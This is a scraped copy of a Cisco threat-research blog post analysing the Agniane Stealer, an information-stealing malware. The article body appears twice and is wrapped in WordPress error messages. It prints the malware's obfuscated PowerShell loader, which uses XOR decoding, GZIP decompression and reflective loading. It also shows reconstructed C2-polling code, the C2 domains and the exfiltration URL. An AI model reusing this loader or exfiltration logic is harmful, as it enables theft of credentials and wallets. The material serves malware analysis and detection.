easy-accordion-free domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114zoho-flow domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114wordpress-seo domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have\u2026 Read more on Cisco Blogs<\/a><\/p>\n \u200b[[“value”:”<\/p>\n The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware\u2019s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware\u2019s architecture and communication.<\/p>\n We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.<\/p>\n The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me\/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.\u201d Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.<\/p>\n During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.<\/p>\n Execution chain.<\/p>\n The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:<\/p>\n http[s]:\/\/<domain name>\/book_[A-Z0-9]+-d+.zip<\/p>\n Once downloaded and extracted,\u00a0the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe). [4]<\/p>\n This enamed PowerShell was used to execute series of obfuscated commands.<\/p>\n passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(\u2018txeTllAdaeR'[-1..-11] -join\u00a0\u201d)(\u2018C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat\u2019).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) \u00a0if<\/strong>\u00a0($_CASH_OjmGK.StartsWith(\u2018:: @\u2019)) $_CASH_ceCmX = $_CASH_OjmGK.Substring(4);\u00a0break<\/strong>; ; ;$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX,\u00a0\u2018_CASH_\u2019,\u00a0\u201d);$_CASH_afghH = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)(\u2018ws33cUsroVN\/EsxO1rOfY1zGajQKWVFEvpkHI\/JP6Is=\u2019);for<\/strong>\u00a0($i =\u00a00; $i -le $_CASH_afghH.Length \u2013\u00a01; $i++) $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); ;$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(\u2018daoL'[-1..-4] -join\u00a0\u201d)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null<\/strong>, (, [string[]] (\u201d)))<\/p>\n The command line shown above performs the following actions:<\/p>\n Reads the content of the previously extracted BAT file (passbook.bat). To understand actions taken toward the objective, we reversed the payload.<\/p>\n The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,<\/p>\n 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.<\/p>\n At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.<\/p>\n The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.<\/p>\n Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.<\/p>\n It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.<\/p>\n After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.<\/p>\n Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.<\/p>\n As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.<\/p>\n Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.<\/p>\n The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:<\/p>\n Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.<\/p>\n The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is \u201c13.\u201d This time request was made to a URL labeled \u201ctest,\u201d for instance.<\/p>\n WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n urlData = wc.DownloadString(\u201chttps:\/\/trecube<\/a>[.]com\/test\u201d);<\/p>\n If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n list_of_active_c2.Add(\u201ctrecube[.]com\u201d)<\/p>\n continue<\/strong>;<\/p>\n\n In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:<\/p>\n trecube[.]com<\/p>\n trecube13[.]ru<\/p>\n imitato23[.]store<\/p>\n wood100home[.]ru<\/p>\n For all these domains, the sample is calling for a test URL.<\/p>\n urlList = \u201chttps:\/\/trecube.com\/<\/a>\u201c,\u00a0\u201chttps:\/\/trecube13.ru\/<\/a>\u201c,\u00a0\u201chttps:\/\/imitato23.store\/<\/a>\u201c,\u00a0\u201chttps:\/\/wood100home.ru\/<\/a>\u201c<\/p>\n for<\/strong>\u00a0domain in domainList:<\/p>\n\n WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n urlData = wc.DownloadString(domain +\u00a0\u201ctest\u201d);<\/p>\n If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n list_of_active_c2.Add(domain)<\/p>\n continue<\/strong>;<\/p>\n\n Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern\u00a0getext?id=<\/strong>\u00a0followed by an ID \u2013 a part of resources of the _CASH_78<\/strong> file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:<\/p>\n *.txt; *.doc; *.docx; *.wallet; *seed*<\/p>\n Again, this is handled as previous checking string in the code. It is parsed\/split by semicolon and a list of extensions is created in a list of variables in C# code.<\/p>\n The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.<\/p>\n Subsequently, the malware requests a remote json <\/strong>file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:<\/p>\n hxxps:\/\/trecube13[.]ru\/getjson?id=67<\/p>\n And here what its corresponding output looks like:<\/p>\n \u201cdebug\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cemulate\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cvirtualbox\u201d:\u00a0\u201c1\u201d,<\/p>\n \u201cvirustotal\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cerror\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cerrorname\u201d:\u00a0\u201cNONE\u201d,<\/p>\n \u201cerrortext\u201d:\u00a0\u201cNONE\u201d<\/p>\n \u201ccompetitor\u201d:\u00a0\u201c0\u201d<\/p>\n\n The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a \u201cgetext<\/strong>\u201d pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,<\/p>\n ru-RU<\/p>\n kk-KZ<\/p>\n ro-MD<\/p>\n uz-UZ<\/p>\n be-BY<\/p>\n az-Latn-AZ<\/p>\n hy-AM<\/p>\n ky-KG<\/p>\n tg-Cyrl-TJ<\/p>\n The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.<\/p>\n Once all the target files are collected, the malware creates a ZIP archive under the \u201clocal application data\u201d folder,<\/p>\n C:Users[user]AppDataLocal[A-Z0-9]32<\/p>\n Below is the structure\/content of this archive file<\/p>\n Agniane Stealer.txt\u00a0\/\/added as attachement here<\/p>\n Installe Apps.txt\u00a0\/\/added as attachement here<\/p>\n PC Information.txt\u00a0\/\/added as attachement here<\/p>\n Files from Desktop\u00a0\/\/FOLDER \u2013 contains exfiltrated files from Desktop folder<\/p>\n Files from \u2026\u00a0\/\/FOLDER \u2013 contains exfiltrated files from \u2026<\/p>\n \u2026\u00a0\/\/and other folders, which contain exfiltrated files.<\/p>\n It is later uploaded to<\/p>\n https:\/\/trecube[.]com\/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0<\/p>\n Below you can find the illustrated version of the Agniane Stealer\u2019s C2 communication,<\/p>\n The C2 communication protocol.<\/p>\n The Agniane Stealer was also seen performing following actions:<\/p>\n Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for installed applications, it also collects this information. The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM\/debug techniques. It exhibits common behavior for stealers such as collecting and exfiltrating files, credentials password, credit card details, wallets, etc. Its evasive nature and targeting of various information might attract more adversaries in future to leverage its services.<\/p>\n Kill Chain<\/strong> Command and Control<\/p>\n Actions on Objectives Type<\/strong> [1] https:\/\/twitter.com\/MalGamy12\/status\/1688984207752663040?t=xECvfQF8pujQERAmhfI41w We\u2019d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!<\/em><\/p>\n Cisco Security Social Channels<\/strong><\/p>\n Instagram<\/a><\/strong>Facebook<\/a><\/strong>Twitter<\/a><\/strong>LinkedIn<\/a><\/strong><\/p>\n “]]\u00a0\u00a0Agniane Stealer is a malware that targets credentials and documents, actively sold on Telegram, with ConfuserEX obfuscations, presents novel C2 protocol.\u00a0\u00a0Read More<\/a>\u00a0Cisco Blogs\u00a0<\/p>","protected":false},"excerpt":{"rendered":" <\/p>\n The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have\u2026 Read more on Cisco Blogs<\/a><\/p>\n \u200b[[“value”:”<\/p>\n The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware\u2019s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware\u2019s architecture and communication.<\/p>\n We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.<\/p>\n The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me\/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.\u201d Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.<\/p>\n During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.<\/p>\n Execution chain.<\/p>\n The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:<\/p>\n http[s]:\/\/<domain name>\/book_[A-Z0-9]+-d+.zip<\/p>\n Once downloaded and extracted,\u00a0the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe). [4]<\/p>\n This enamed PowerShell was used to execute series of obfuscated commands.<\/p>\n passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(\u2018txeTllAdaeR'[-1..-11] -join\u00a0\u201d)(\u2018C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat\u2019).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) \u00a0if<\/strong>\u00a0($_CASH_OjmGK.StartsWith(\u2018:: @\u2019)) $_CASH_ceCmX = $_CASH_OjmGK.Substring(4);\u00a0break<\/strong>; ; ;$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX,\u00a0\u2018_CASH_\u2019,\u00a0\u201d);$_CASH_afghH = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)(\u2018ws33cUsroVN\/EsxO1rOfY1zGajQKWVFEvpkHI\/JP6Is=\u2019);for<\/strong>\u00a0($i =\u00a00; $i -le $_CASH_afghH.Length \u2013\u00a01; $i++) $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); ;$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(\u2018daoL'[-1..-4] -join\u00a0\u201d)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null<\/strong>, (, [string[]] (\u201d)))<\/p>\n The command line shown above performs the following actions:<\/p>\n Reads the content of the previously extracted BAT file (passbook.bat). To understand actions taken toward the objective, we reversed the payload.<\/p>\n The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,<\/p>\n 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.<\/p>\n At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.<\/p>\n The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.<\/p>\n Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.<\/p>\n It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.<\/p>\n After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.<\/p>\n Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.<\/p>\n As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.<\/p>\n Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.<\/p>\n The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:<\/p>\n Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.<\/p>\n The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is \u201c13.\u201d This time request was made to a URL labeled \u201ctest,\u201d for instance.<\/p>\n WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n urlData = wc.DownloadString(\u201chttps:\/\/trecube<\/a>[.]com\/test\u201d);<\/p>\n If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n list_of_active_c2.Add(\u201ctrecube[.]com\u201d)<\/p>\n continue<\/strong>;<\/p>\n In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:<\/p>\n trecube[.]com<\/p>\n trecube13[.]ru<\/p>\n imitato23[.]store<\/p>\n wood100home[.]ru<\/p>\n For all these domains, the sample is calling for a test URL.<\/p>\n urlList = \u201chttps:\/\/trecube.com\/<\/a>\u201c,\u00a0\u201chttps:\/\/trecube13.ru\/<\/a>\u201c,\u00a0\u201chttps:\/\/imitato23.store\/<\/a>\u201c,\u00a0\u201chttps:\/\/wood100home.ru\/<\/a>\u201c<\/p>\n for<\/strong>\u00a0domain in domainList:<\/p>\n WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n urlData = wc.DownloadString(domain +\u00a0\u201ctest\u201d);<\/p>\n If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n list_of_active_c2.Add(domain)<\/p>\n continue<\/strong>;<\/p>\n Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern\u00a0getext?id=<\/strong>\u00a0followed by an ID \u2013 a part of resources of the _CASH_78<\/strong> file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:<\/p>\n *.txt; *.doc; *.docx; *.wallet; *seed*<\/p>\n Again, this is handled as previous checking string in the code. It is parsed\/split by semicolon and a list of extensions is created in a list of variables in C# code.<\/p>\n The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.<\/p>\n Subsequently, the malware requests a remote json <\/strong>file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:<\/p>\n hxxps:\/\/trecube13[.]ru\/getjson?id=67<\/p>\n And here what its corresponding output looks like:<\/p>\n \u201cdebug\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cemulate\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cvirtualbox\u201d:\u00a0\u201c1\u201d,<\/p>\n \u201cvirustotal\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cerror\u201d:\u00a0\u201c0\u201d,<\/p>\n \u201cerrorname\u201d:\u00a0\u201cNONE\u201d,<\/p>\n \u201cerrortext\u201d:\u00a0\u201cNONE\u201d<\/p>\n \u201ccompetitor\u201d:\u00a0\u201c0\u201d<\/p>\n The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a \u201cgetext<\/strong>\u201d pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,<\/p>\n ru-RU<\/p>\n kk-KZ<\/p>\n ro-MD<\/p>\n uz-UZ<\/p>\n be-BY<\/p>\n az-Latn-AZ<\/p>\n hy-AM<\/p>\n ky-KG<\/p>\n tg-Cyrl-TJ<\/p>\n The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.<\/p>\n Once all the target files are collected, the malware creates a ZIP archive under the \u201clocal application data\u201d folder,<\/p>\n C:Users[user]AppDataLocal[A-Z0-9]32<\/p>\n Below is the structure\/content of this archive file<\/p>\n Agniane Stealer.txt\u00a0\/\/added as attachement here<\/p>\n Installe Apps.txt\u00a0\/\/added as attachement here<\/p>\n PC Information.txt\u00a0\/\/added as attachement here<\/p>\n Files from Desktop\u00a0\/\/FOLDER \u2013 contains exfiltrated files from Desktop folder<\/p>\n Files from \u2026\u00a0\/\/FOLDER \u2013 contains exfiltrated files from \u2026<\/p>\n \u2026\u00a0\/\/and other folders, which contain exfiltrated files.<\/p>\n It is later uploaded to<\/p>\n https:\/\/trecube[.]com\/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0<\/p>\n Below you can find the illustrated version of the Agniane Stealer\u2019s C2 communication,<\/p>\n The C2 communication protocol.<\/p>\n The Agniane Stealer was also seen performing following actions:<\/p>\n Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for installed applications, it also collects this information. The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM\/debug techniques. It exhibits common behavior for stealers such as collecting and exfiltrating files, credentials password, credit card details, wallets, etc. Its evasive nature and targeting of various information might attract more adversaries in future to leverage its services.<\/p>\n Kill Chain<\/strong> Command and Control<\/p>\n Actions on Objectives Type<\/strong> [1] https:\/\/twitter.com\/MalGamy12\/status\/1688984207752663040?t=xECvfQF8pujQERAmhfI41w We\u2019d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!<\/em><\/p>\n Cisco Security Social Channels<\/strong><\/p>\n Instagram<\/a><\/strong>Facebook<\/a><\/strong>Twitter<\/a><\/strong>LinkedIn<\/a><\/strong><\/p>\nIntroduction<\/strong><\/h2>\n
Execution Chain<\/strong><\/h2>\n
\nThrough string matches and replacements, builds the payload dynamically and assigns it to a variable.
\nConverted payload and static key from Base64 to a byte array.
\nXOR\u2019d the payload using a static key.
\nDecompressed XOR\u2019d payload using GZIP.
\nInvokes payload after reflectively loading it into memory.<\/p>\nBinary Analysis<\/strong><\/h2>\n
Command and Control<\/strong><\/h2>\n
Other TTPs<\/strong><\/h2>\n
\nChecking for a public IP on a ip-api.com, i.e,
\nhttps:\/\/ip-api.com\/json\/?fields=11827
\nDumping Bitcoin and other cryptocurrency wallets
\nPerforming (not well) checks to see if it\u2019s running in a debugged or virtual env. etc.
\nCollecting wallet.dat files.
\nEnumerating Profile and User data.
\nCollecting stored credit cards.
\nAdding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).<\/p>\nConclusion<\/strong><\/h2>\n
Kill Chain<\/strong><\/h2>\n
\nActivity<\/strong>
\nTTP<\/strong>
\nWeaponization
\nUse of PowerShell, ZIP file, batch file
\nT1059.005
\nT1059.001
\nDelivery
\nZIP file downloaded by the browser
\nT1204.002
\nUse of compromised websites
\nT1584.004
\nExploitation
\nRunning Obfuscated PowerShell payload
\nT1059.001
\nT1027.010
\nPowerShell decrypts payload using XOR and decompress using Gunzip
\nT1140
\nT1059.001
\nReflective loading of the payload through Powershell
\nT1059.001
\nT1204.002
\nT1620
\nUse of Renamed PowerShell
\nT1036.003
\nInstallation<\/p>\n
\nCollection of various information from the host
\nT1119
\nTargeting of credentials
\nT1555<\/p>\nIndicators of Compromise<\/strong><\/h2>\n
\nStage<\/strong>
\nIOC (indicators of compromise)<\/strong>
\nFile Hash
\nDelivery
\n5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
\nFile Hash
\nDelivery
\ne59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
\nFile Hash
\nDelivery
\nb2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
\nDomain
\nC2
\ntrecube[.]com
\nDomain
\nC2
\ntrecube[.]store
\nDomain
\nC2
\ntrecube13[.]ru
\nDomain
\nC2
\nimitato23[.]store
\nDomain
\nC2
\nwood100home[.]ru<\/p>\nReferences<\/h2>\n
\n[2] https:\/\/www.zscaler.com\/blogs\/security-research\/agniane-stealer-dark-web-s-crypto-threat
\n[3] https:\/\/blog.pulsedive.com\/analyzing-agniane-stealer\/
\n[4] https:\/\/www.pcrisk.com\/removal-guides\/27510-agniane-stealer<\/p>\nIntroduction<\/strong><\/h2>\n
Execution Chain<\/strong><\/h2>\n
\nThrough string matches and replacements, builds the payload dynamically and assigns it to a variable.
\nConverted payload and static key from Base64 to a byte array.
\nXOR\u2019d the payload using a static key.
\nDecompressed XOR\u2019d payload using GZIP.
\nInvokes payload after reflectively loading it into memory.<\/p>\nBinary Analysis<\/strong><\/h2>\n
Command and Control<\/strong><\/h2>\n
Other TTPs<\/strong><\/h2>\n
\nChecking for a public IP on a ip-api.com, i.e,
\nhttps:\/\/ip-api.com\/json\/?fields=11827
\nDumping Bitcoin and other cryptocurrency wallets
\nPerforming (not well) checks to see if it\u2019s running in a debugged or virtual env. etc.
\nCollecting wallet.dat files.
\nEnumerating Profile and User data.
\nCollecting stored credit cards.
\nAdding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).<\/p>\nConclusion<\/strong><\/h2>\n
Kill Chain<\/strong><\/h2>\n
\nActivity<\/strong>
\nTTP<\/strong>
\nWeaponization
\nUse of PowerShell, ZIP file, batch file
\nT1059.005
\nT1059.001
\nDelivery
\nZIP file downloaded by the browser
\nT1204.002
\nUse of compromised websites
\nT1584.004
\nExploitation
\nRunning Obfuscated PowerShell payload
\nT1059.001
\nT1027.010
\nPowerShell decrypts payload using XOR and decompress using Gunzip
\nT1140
\nT1059.001
\nReflective loading of the payload through Powershell
\nT1059.001
\nT1204.002
\nT1620
\nUse of Renamed PowerShell
\nT1036.003
\nInstallation<\/p>\n
\nCollection of various information from the host
\nT1119
\nTargeting of credentials
\nT1555<\/p>\nIndicators of Compromise<\/strong><\/h2>\n
\nStage<\/strong>
\nIOC (indicators of compromise)<\/strong>
\nFile Hash
\nDelivery
\n5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
\nFile Hash
\nDelivery
\ne59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
\nFile Hash
\nDelivery
\nb2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
\nDomain
\nC2
\ntrecube[.]com
\nDomain
\nC2
\ntrecube[.]store
\nDomain
\nC2
\ntrecube13[.]ru
\nDomain
\nC2
\nimitato23[.]store
\nDomain
\nC2
\nwood100home[.]ru<\/p>\nReferences<\/h2>\n
\n[2] https:\/\/www.zscaler.com\/blogs\/security-research\/agniane-stealer-dark-web-s-crypto-threat
\n[3] https:\/\/blog.pulsedive.com\/analyzing-agniane-stealer\/
\n[4] https:\/\/www.pcrisk.com\/removal-guides\/27510-agniane-stealer<\/p>\n